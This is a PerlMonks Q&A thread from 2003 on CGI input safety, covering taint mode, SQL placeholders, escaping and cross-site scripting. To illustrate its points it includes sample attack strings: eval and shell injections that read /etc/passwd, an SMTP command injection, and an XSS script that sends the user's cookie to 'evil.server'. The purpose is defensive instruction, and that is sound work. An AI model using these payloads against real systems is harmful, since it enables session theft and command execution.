Beefy Boxes and Bandwidth Generously Provided by pair Networks
Problems? Is your data what you think it is?
 
PerlMonks  

Back to acceptable untainted characters

by bradcathey (Prior)
on Sep 07, 2003 at 02:03 UTC ( [id://289525]=perlquestion: print w/replies, xml ) Need Help??

bradcathey has asked for the wisdom of the Perl Monks concerning the following question:

Confession: I asked a similar question back in July, but I have just read Ovid's (ovid) "homily" on CGI and Perl, and besides being racked with guilt (for not writing scripts with -T--but I'm changing all that), I'd like to get more clarity.

(I have been running client-side validation via an external .js file, but I read somewhere that 's a bad idea. Comments?)

I do not know the mind or methods of the "cracker," but I want to know if there is any character(s) that I should absolutely not let through because of the havoc they can potential wreak.

My applications are HTML forms that are parsed and either send an e-mail with the data printed in the e-mail, or inserted into a MySQL db for later display via HTML::Template.

I would like to allow my users to write using normal punctuation (I've gotten complaints that I was too restrictive by not allowing !:?, etc.). So, can I allow any character and not cause a security problem?

BTW, do these very nodes get checked for bad stuff, and if so, what won't the superior monks let through?

Thanks in advance for further clarifying this concept that I'm having a hard time getting my head around.

  • Comment on Back to acceptable untainted characters

Replies are listed 'Best First'.
Re: Back to acceptable untainted characters
by sgifford (Prior) on Sep 07, 2003 at 03:50 UTC

    Characters aren't dangerous to your Perl program in itself. Passing them along to something else that may interpret them specially is what's dangerous. And knowing how the components you interact with will interpret the characters is the key to security (at least from this class of problems).

    For example:

    • If you're taking user input and using it in eval, well, you should probably find another way of doing what you're doing. But let's pretend there's some reason you have to, as an illustration. You could write something like this:
      eval "print OUT '$unsafe_input' or die";
      . This isn't safe; we can see this by thinking about how Perl will interpret their input. Well, inside a string, a variable identifier will be interpreted, which might give away secret information (think $unsafe_input="',\$DATABASE_PASSWORD,'"), so the this-is-a-variable characters are unsafe---$@%. Also, escaping from that quoted string would be a real problem (think $unsafe_input="'; system('cat /etc/passwd'); print '"), so single-quotes are dangerous.
    • As you mentioned, if you're using mySQL, single-quotes are dangerous.
    • To the shell, shell metacharacters are dangerous, so you have to be particularly careful of $;*&|?.
    • If you're printing the user's input to a Web page, you better make sure it doesn't have HTML tags in it, or else your Web site will be vulnerable to a Cross-Site Scripting attack. So, you'd better prevent code to create HTML tags, such as <>. Taint mode doesn't catch this one.
    • If you're using a user's input to execute a network protocol, say SMTP protocol, you have to be careful of single dots on a line by themselves, since they introduce a command. If you're taking the body of a message, for example, and sending it over SMTP, they could enter into their body ".\r\nMAIL FROM:<somebody_else>\r\nRCPT TO:<victim>\r\nBODY\r\n..." to leave the message they were sending, and create their own, perhaps to spam.
    Once you know what sorts of characters are unsafe, you need to stop them from being interpreted by the program you're interacting with. The two ways to do that are to disallow them, or escape them. Escaping is usually riskier because it's easier to make a mistake. For example, let's say you're trying to fix that eval with $user_input =~ s/(\"\@\$\%)/\\$1/g;. Well, what if $user_input='\"; cat /etc/passwd; print \"rest'? Your RE replaces the " characters with \, so the \" becomes \\"---an escaped backslash, and an unescaped quote. Yikes! The solution is to also escape the backslash. Now \" turns into \\\", which is an escaped backslash followed by an escaped quote.

    The other option is to disallow them altogether. This is safer, since it's easier to do this correctly, but it can be restrictive. If you're asking a user to enter a passage from a book, it may not be acceptable to disallow quotation marks. If you're asking a user for a password, you shouldn't reject any characters.

    The final thing to keep in mind is when you're restricting characters, it's safer to think of all of the characters you know are safe than aren't. That way if you make a mistake, you've erred on the side of caution.

    Taint mode is designed to help you do this, but it only works when it knows which input sources are unsafe, which interactions are unsafe, and when you tell it how to make user input safe for use. You should be using taint mode, but only as a tool for catching you when you make a mistake, not as a primary line of defense.

    Whenever you're interacting with some system that a user can't normally interact with (a database you're authenticated to, a shell on a public Web server), think hard about what an attacker could to to make a mess of things, and then prevent it. Try a few things, and see how they're handled. Getting a particularly devious friend or co-worker to think of ways to subvert your system can be effective.

    A final note is that some modules can provide extra information to taint, such as telling DBI to treat all queries as an interaction that requires taint checking, or telling CGI that its output should be taint checked. I don't recall the names of these modules, but CPAN should be able to find them.

    Update: Fixed eval example near top so it's actually insecure.

      sgifford, would you or some mind explaining this in greater detail:

      If you're printing the user's input to a Web page, you better make sure it doesn't have HTML tags in it, or else your Web site will be vulnerable to a Cross-Site Scripting attack. So, you'd better prevent code to create HTML tags, such as ><. Taint mode doesn't catch this one.

      Currently, using HTML::Template, I'm doing stuff like this with data from my db:
      my $html = "<b>Signed up:<b>\n <table><tr><td>$data<\/td><\/tr> <\/table>\n"; $template -> param(html => $html);
      Cool or not?

      Thanks

        Barring security issues:
        Well, you can do it that way ... or you could set up a "widget" called signed_up.tmpl:
        <b>Signed up:<b> <table><tr><td><tmpl_var data><\/td><\/tr> <\/table>
        Include that in the main page:
        <tmpl_include signed_up.tmpl>
        And just make sure that the HTML::Template object responsible for populating the main page handles that <tmpl_var data> tag. I discuss this technique more at 3Re: HTML::Template - complex sites. Feel free to play with the code i have posted there.

        Now then, as for security ... if you don't want to allow your users to submit HTML, the easiest hack you can do is:

        my $data = '<html>evil tags!!</html>'; $data =~ s/</&lt;/g;
        This will convert all < characters to &lt; which will effectively keep the tag from rendering.

        jeffa

        L-LL-L--L-LL-L--L-LL-L--
        -R--R-RR-R--R-RR-R--R-RR
        B--B--B--B--B--B--B--B--
        H---H---H---H---H---H---
        (the triplet paradiddle with high-hat)
        
        For my web site, I wrote a perl module that cleans up user submitted html, by only allowing sanctioned html tags to pass through. So, you can allow <P> and <b> but not anything else if you wanted.

        I intended to submit it to cpan, but never had the time. Anyway, you can download it here: HTMLCleaner.pm. It's got pod documentation. And if anyone wants to develop it, they are free to do so.

        It depends on whether $data is under the user's control or not.

        If it is, it's best to prevent all HTML. I usually use an HTML escaping module, like the escapeHTML function provided by CGI.

        Otherwise, if a malicious user can trick a legitimate user into setting $data to some Javascript code, the malicious user can steal cookies for your domain, or any other information in the page or the form.

      Thanks much graff and sgifford for your indepth replies. I think I'll have to print them out and study them indepth. Great stuff.

      I look forward to the day when I can be as helpful to some other fledgling coder.

      eval 'print OUT "$unsafe_input" or die';

      I do not think this is going to do what you said it does. Variables are not interpolated inside 'single quotes', so the eval only interpolates the variable one time. So, even if $unsafe_input='$DATABASE_PASSWORD', the password would not be printed.

      On the other hand, it would print the password if the code was like this: eval "print OUT \"$unsafe_input\" or die";

Re: Back to acceptable untainted characters
by graff (Chancellor) on Sep 07, 2003 at 03:34 UTC
    I have been running client-side validation via an external .js file, but I read somewhere that 's a bad idea.

    The main problem would be that people can set their browsers to ignore javascript, which means that your client-side validation does not execute, and anything goes.

    My applications are HTML forms that are parsed and either send an e-mail with the data printed in the e-mail, or inserted into a MySQL db for later display via HTML::Template.

    Here, it's not so much a question of what users type, but rather how you handle the data they send you. There are "safe" and "unsafe" methods of sending emails and inserting/updating database content.

    In general terms, the difference is that the unsafe methods involve passing the user-supplied text to a process (a shell, mailer or db engine) as part of a single command or instruction string, so that the process will have the "opportunity" to parse, evaluate and try to execute the user-supplied string; usually the bad things that happen are innocent "mistakes" -- the user includes one or more of: single-quote, semi-colon, new-line, parentheses and/or other brackets, etc, which end up being "meaningful" to the process in unintended ways and cause the process to fail. But worst case would be someone who actually guesses the vulnerability and provides a parsable, executable and malicious string.

    Safe methods, in contrast, run the mailer, shell or db engine with discrete arguments/parameters/strings. Instructions to the process (insert/update, email address, or whatever) are provided separately from user-supplied text ("free-form data entry"), and this latter stuff is therefore passed straight through (into the db, mail message or whatever) without trying to do further interpretation of its content, which is exactly what you want.

    So in the case of passing content to MySQL, just make sure the SQL statement is prepared using the "?" placeholders for values to be searched for or written into the table, and pass the user-supplied text to DBI's execute method -- no worries about quote characters or anything when you do it this way.

    I'm less conversant with mailer modules, but I think Mail::Mailer is a reasonably good tool that allows you to control how the mail header is assembled, and to supply the message body (user-supplied text) as a separate scalar value, keeping it safely away from any sort of executable context; search for "Mail" on the CPAN for a wide range of alternatives and supplements. (You might still want to "filter" user-supplied content, to watch out for things that look like base64-encoded virus attachments or whatever, but in your case, this is probably not really a thing to worry about.)

    Trying to do shell operations based on user input is a rarer and trickier thing -- in general, this is not done, unless with a very limited scope; e.g. the CGI script itself has a limited set of specific shell operations it is able to perform, based on, say, filenames or other information present on the server, and user input is used only to decide which if any of the allowed/possible operations to do.

Re: Back to acceptable untainted characters
by Anonymous Monk on Sep 07, 2003 at 02:21 UTC
    There are no dangerous characters. You've managed to miss the point of not trusting user input, which is don't do dangerous things with user input, and if you do, be very careful (ie, don't trust it). If you're storing text users submit via a form, let them submit whatever they want, but don't try to eval it.
      Ahhh, so it's ME I need to watch, and not so much the user? Good point. Thanks. BTW, I am escaping the single ' for MySQL use, for obvious reasons.
      I have to disagree.

      For the integrity of your own server, you are (I believe) correct. But if someone evil submits code that breaks into the browser of whoever is reading the text, that one with the compromized system will not be pleased (s)he used your solution.

      So, please strip scripts as a bare minimum.

Re: Back to acceptable untainted characters
by dtr (Scribe) on Sep 07, 2003 at 13:40 UTC

    Just to add my £0.02 to the excellent points raised already in this post, the other big issue you'll have when writing HTML from CGIs is avoiding Cross Site Scripting attacks (XSS).

    Basically, most sites require users to log in via a form, and they then get given a cookie containing some form of session-id or authenticator, which allows the site to verify that they have successfully authenticated from then on.

    So, if someone inserts some code like

    <script language="JavaScript"> document.write("<img src='http://evil.server/'+document.cookie+'.jpg'> +); </script>
    into one of your foems, and this gets rendered onto a page, then anyone who looks at this page on the site will download the image from evil.server, and give evil.server their cookie. The server can then be configured to, for example, do a http request to the password changing page and assign you a new password, or anything else that the site allows.

    Your best bet when displaying HTML is to taint anything from the database that could contain a string (see the Taint module on CPAN, or use the TaintOut => 1 arcument to DBI->connect to taint everything you read from the database automatically). This prevents you from accidentally forgetting to escape a string you meant to. Then, set up a regex to replace ' with &#39; < with &lt; and so on. This will prevent such nasties from actually running.

      use the TaintOut => 1 argument to DBI->connect

      ++ Very cool thing that is, indeed. Put that in my dbconn subroutine, plus what I already have in my input-getting function, and I don't have to worry so much about forgetting to mark something as tainted.

      I still have to remember to encode entities on untrusted data going to the browser, though.


      $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/
Re: Back to acceptable untainted characters
by zakzebrowski (Curate) on Sep 07, 2003 at 14:29 UTC
    Why not just take the users input for password, and then just generating from perl an md5 digest or similar? That way, regardless of what they type in, (which can contain many special characters as they like), you will be sending the database alphanumeric characters only (if you choose the hex digest option).

    ----
    Zak
Re: Back to acceptable untainted characters
by bradcathey (Prior) on Sep 08, 2003 at 01:17 UTC
    Thanks all. I think I getting the gist. But let me summarize what I've read on this thread (knowing there's lots more elsewhere):

    0. It's not necessarily what the user enters, but what I do with it

    1. Don't trust user input, so use -T

    2. RegExp data from user form to untaint, but RegExps can vary depending on what I want to allow them to enter

    3. In all cases, RegExp/escape any HTML from users so the code would never render in a browser

    4. Stay away from shells and evals (this should be no problem, 'cause I don't know enough to even know why I'd want to use one), but also file ops that use user input

    5. Use placeholders in MySQL inserts

    6. Use modules where I can find them to help

    Sorry if I was flogging the proverbial dead horse, but you can see what a little paranoia can do!

    Thanks again.

    P.S. Just read Gunther Birzniek's excellent article CGI/Perl Taint Mode FAQ
      3. In all cases, RegExp/escape any HTML from users so the code would never render in a browser
      ...unless you want some HTML to render, as you might in e.g. a user "biography" field. In that case, you'll probably want to do some trickery with an HTML parser module to allow a few tags and attributes and strip out the rest.

      Once again, though, note the use of "allow". Decide what's permissible and take out everything else. Better safe than sorry.

      =cut
      --Brent Dax
      There is no sig.

        Thanks BrentDax. That was a helpful word.

      4. Stay away from shells and evals (this should be no problem, 'cause I don't know enough to even know why I'd want to use one), but also file ops that use user input

      Some people are more comfortable using the shell than they are with Perl, so they might choose to write
      system("rm $filename");
      instead of using unlink. This would be a problem if $filename were a string beginning with a semicolon followed by another shell command. Taint mode will not allow system to execute when given tainted input, to prevent that type of thing from happening.

Re: Back to acceptable untainted characters
by jonadab (Parson) on Sep 08, 2003 at 14:37 UTC

    Don't untaint all your data. That defeats the purpose of running in taint mode. Leave the data tainted, unless taint mode stops you from doing something you need to do, and then just untaint (carefully) the ones you need to use that way. In fact, if you use a regex to parse fields out of something, you should mark the extracted fields as tainted unless your regex was carefully constructed to make sure they're safe. The whole point of Taint mode is to alert you when you're doing something potentially unsafe. At that point, you want to check the datum you're doing it with specifically in terms of the operation you're performing, to make it safe for that. For example, if you're doing a system call that will be interpreted by a shell, you want to strip shell metacharacters. But you don't need to strip shell metacharacters when you send an email.

    MySQL can store anything safely, if you use ? and pass in the value in the execute() call. However, you need to think about what you're going to do with the data when they come out of MySQL. If you don't check them before you put them in, you mark them as tainted when you take them out.

    As far as content going to the browser: decide whether its plain text or HTML. If it's text, just encode the entities and have done. This is easy (there is a module for it on CPAN) and as safe as is necessary for ordinary purposes. If it's HTML, you'll want to check it for certain dangerous things, like scripts, and personally I also like to minimally parse it (basically just check for wellformedness), and if it's not wellformed revert to treating it like plain text (i.e., encode entities). This will annoy people who like to write old-style HTML with <p> tags between (instead of around) paragraphs, but it will also prevent any number of easy-to-make stupid mistakes, like forgetting to close off a table (which causes huge problems for older browsers).

    For email: if you're sending as text/plain, which you should be, I wouldn't worry about it too much. There are tricks that can be played to make Outlook think something is an attachment even though the headers don't say so, but people who use Outlook are going to get viruses regularly anyway, so don't sweat it.


    $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/

      In fact, if you use a regex to parse fields out of something, you should mark the extracted fields as tainted unless your regex was carefully constructed to make sure they're safe.

      How does one mark a variable as tainted? I did not realize the program had any way to control it directly.

        How does one mark a variable as tainted?
        use Taint (); Taint::taint($untrustedvalue);

        For example, if you use a regex to parse the key-value fields out of a query string and reverse the CGI encoding, you should mark the resulting data as tainted. (The "use CGI or die" advocates will tell you that you shouldn't be writing your own function for that anyway, but hat's another debate for another thread.)


        $;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/
Re: client-side scripts
by TomDLux (Vicar) on Sep 08, 2003 at 23:32 UTC

    Client-sided scripts are not effective for security .... they prevent innocent bystanders from attacking you, but malevolent people will side-step your scripts. They resemble a locked front door with a wide open window right next to it.

    However, client-side scripts are useful for things like verifying user input. While the scripts can irritate users, especially if poorly written, but submitting a form-full of defective data to the server is worse.

    --
    TTTATCGGTCGTTATATAGATGTTTGCA

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: perlquestion [id://289525]
Approved by PodMaster
Front-paged by jonnyfolk
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others taking refuge in the Monastery: (5)
As of 2024-04-20 14:46 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found